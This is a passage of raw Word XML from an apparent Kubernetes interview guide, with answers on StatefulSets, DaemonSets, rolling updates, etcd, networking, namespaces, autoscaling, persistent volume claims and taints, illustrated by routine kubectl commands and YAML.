          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secret:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used to store sensitive data such as passwords, OAuth tokens, and SSH keys in an encrypted form. Secrets can be mounted as volumes or exposed as environment variables in Pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A4216F"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Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A3671C" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="609"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secrets are intended for sensitive data and are encrypted at rest, whereas ConfigMaps are for non-sensitive configuration data and are not encrypted by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB75119"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1" w:name="_Toc178383393"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. What is a StatefulSet, and when would you use it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="69AF0133"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lastRenderedPageBreak/>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A StatefulSet is a Kubernetes controller that manages the deployment and scaling of a set of Pods with persistent identities and stable storage. It is used for stateful applications where each Pod needs a unique identity and stable, persistent storage (e.g., databases, distributed systems like Kafka).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CDE88D"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F600E" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Databases (e.g., MySQL, Cassandra)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F4FC96" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Distributed data stores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058AD7F1" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stateful applications where Pod identity and storage persistence are critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8AFD09"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2" w:name="_Toc178383394"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8. What is a DaemonSet in Kubernetes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w14:paraId="011A1CDD"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 DaemonSet ensures that a specific Pod runs on all (or a subset of) nodes in a cluster. When a new node is added to the cluster, the DaemonSet automatically schedules the defined Pod on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1EE8C"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB96DC4" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log collection agents (e.g., Fluentd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB4D5A3" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring agents (e.g., Prometheus Node Exporter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D74BB75" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Networking components (e.g., CNI plugins)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02487144"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3" w:name="_Toc178383395"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9. How do you perform rolling updates and rollbacks in Kubernetes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w14:paraId="302DF7A0"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Rolling updates allow you to update the containers in your Pods gradually, without downtime. Kubernetes handles rolling updates automatically when you change a Deployment’s Pod template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E817843"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Performing a Rolling Update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771ECD3C"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kubectl set image deployment/nginx-deployment nginx=nginx:1.16.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B46071"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Rolling Back to a Previous Version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680F539"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kubectl rollout undo deployment/nginx-deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4C45ED"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes keeps a history of Deployment revisions, allowing you to easily roll back if something goes wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523741B"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4" w:name="_Toc178383396"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. What is the role of etcd in Kubernetes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w14:paraId="4C2A15EF"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etcd is a distributed key-value store that serves as the backing store for all cluster data in Kubernetes. It stores configuration data, the state of all resources, and metadata, making it crucial for cluster operations. It must be highly available and reliable, as any loss or corruption of etcd data can lead to cluster instability or failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059861C5" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11. How does Kubernetes handle networking?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB8447"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Kubernetes networking is built around several key concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E7D1A" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pod-to-Pod Communication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> All Pods can communicate with each other across nodes without NAT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F51F1BD" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pod-to-Service Communication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Services abstract Pod networking, providing stable IPs and load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B3A858" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="612"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>External-to-Service Communication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes provides several ways for external traffic to access services (NodePort, LoadBalancer, Ingress).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E09CA"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes relies on Container Network Interface (CNI) plugins to implement networking. Popular CNI plugins include Flannel, Calico, Weave, and Cilium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA71B6"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5" w:name="_Toc178383397"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12. What is the purpose of the kube-proxy?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w14:paraId="1B49191A"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kube-proxy is a network component that runs on each worker node in the Kubernetes cluster. It manages the network rules that allow communication to Pods from inside and outside the cluster. kube-proxy implements a form of load balancing by forwarding traffic to the appropriate backend Pods based on the service's cluster IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E54C6F2"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6" w:name="_Toc178383398"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13. What are Kubernetes namespaces, and why are they used?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w14:paraId="75611D35"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Namespaces in Kubernetes are a way to divide cluster resources between multiple users or teams. They provide a scope for names, helping avoid naming collisions and allowing fine-grained access control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA7EA7"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9A503" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Separate environments (e.g., development, staging, production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECC1D7C" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Multi-tenancy in large clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793FD21" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Resource quotas and limits per namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3362C816"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7" w:name="_Toc178383399"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14. Explain the Horizontal Pod Autoscaler (HPA).</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w14:paraId="6FA2B973"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The Horizontal Pod Autoscaler automatically scales the number of Pods in a Deployment, ReplicaSet, or StatefulSet based on observed CPU utilization, memory utilization, or custom metrics. It ensures that your application can handle varying loads efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B1593A"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33D70C02"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kubectl autoscale deployment nginx-deployment --cpu-percent=50 --min=1 --max=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4790C"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This command scales the Deployment based on CPU usage, maintaining between 1 and 10 replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4B6C6"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8" w:name="_Toc178383400"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15. How do you manage persistent storage in Kubernetes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w14:paraId="1774959C"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Kubernetes provides several ways to manage persistent storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C46AE" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PersistentVolume (PV):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A cluster-wide resource that defines storage (e.g., NFS, AWS EBS) that can be used by Pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C506636" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PersistentVolumeClaim (PVC):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A request for storage by a Pod. A PVC is bound to a PV, providing storage to the Pod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336E2020" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>StorageClass:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows dynamic provisioning of PVs based on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D344DE"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4D450D4D"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C2AE5"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kind: PersistentVolumeClaim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA690EB"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D127FC8"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name: my-pvc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BCF199"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D6189"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accessModes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE38E47"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ReadWriteOnce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D5F489"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resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69131531"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requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20E872"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storage: 5Gi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582299E"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storageClassName: standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8361D2"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19" w:name="_Toc178383401"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>16. What are taints and tolerations in Kubernetes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w14:paraId="144CA3D0"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Taints and tolerations work together to ensure that Pods are only scheduled on appropriate nodes. A taint is applied to a node to mark it as "unsuitable" for certain Pods. A Pod can tolerate a taint using a toleration, allowing it to be scheduled on that node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3512F7"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25749C" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="615"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dedicated nodes for specific workloads (e.g., GPU workloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF74736" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="615"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Preventing Pods from being scheduled on specific nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273A17C"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC988E3"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50956061"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tolerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F4315"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key: "key1"</w:t>
      </w:r>
    </w:p>
